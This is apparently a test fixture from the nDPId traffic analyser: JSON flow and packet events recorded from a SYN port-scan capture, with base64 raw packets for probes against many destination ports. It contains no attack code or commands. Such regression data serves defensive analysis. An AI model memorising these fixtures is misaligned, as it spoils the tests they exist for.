+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsQHUAADIG1f2sEAAIQA2GNIzTw1DdU4MZAAAAAGACDABpOwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQ8AADEG8mOsEAAIQA2GNIzSBA7dUoMYAAAAAGACCAAsgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsOxEAADIG22GsEAAIQA2GNIzSB9jdUoMYAAAAAGACDAAktwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_packet_id":1,"flow_last_seen":1278275061155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061155,"pkt":"ACYLMQczACWzv5HuCABFAAAskNcAACgGj5usEAAIQA2GNIzSBNTdUoMYAAAAAGACBAAvuwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAAC4GGTOsEAAIQA2GNIzSAFXdUoMYAAAAAGACDAAsOgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsL9AAADcG4aKsEAAIQA2GNIzSCAHdUoMYAAAAAGACEAAgjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAADcGDW6sEAAIQA2GNIzSGfbdUoMYAAAAAGACEAAOmQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsDuMAACoGD5CsEAAIQA2GNIzSA+\/dUoMYAAAAAGACDAAooAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6QAACgGwM6sEAAIQA2GNIzSBFTdUoMYAAAAAGACBAAwOwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsdbIAACYGrMCsEAAIQA2GNIzSpg7dUoMYAAAAAGACDACGgAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsxmUAADQGTg2sEAAIQA2GNIzSAdHdUoMYAAAAAGACBAAyvgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dgAADEGHZqsEAAIQA2GNIzSDDjdUoMYAAAAAGACCAAkVwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsQg4AACsG22SsEAAIQA2GNIzSAnHdUoMYAAAAAGACEAAmHgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsIHkAADAG9\/msEAAIQA2GNIzSCBHdUoMYAAAAAGACBAAsfgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs7ucAACYGM4usEAAIQA2GNIzTgALdU4MZAAAAAGACDACsiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmoAACkG9QisEAAIQA2GNIzTFxfdU4MZAAAAAGACCAAZdQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7wAACcGYbasEAAIQA2GNIzTBdbdU4MZAAAAAGACEAAitgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsookAACUGgOmsEAAIQA2GNIzSC2jdUoMYAAAAAGACCAAlJwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs3UgAADQGNyqsEAAIQA2GNIzSDmndUoMYAAAAAGACBAAmJgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsLIAAADcG5PKsEAAIQA2GNIzSFi7dUoMYAAAAAGACEAASYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsXFUAACYGxh2sEAAIQA2GNIzSCi\/dUoMYAAAAAGACDAAiYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsfogAADoGj+qsEAAIQA2GNIzSBwndUoMYAAAAAGACDAAlhgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2oAAC4GewisEAAIQA2GNIzSD6HdUoMYAAAAAGACDAAc7gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsISAAADgG71KsEAAIQA2GNIzSgAfdUoMYAAAAAGACBAC0hwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/MAADgGgH+sEAAIQA2GNIzSAYXdUoMYAAAAAGACBAAzCgAAAgQFtA=="} 
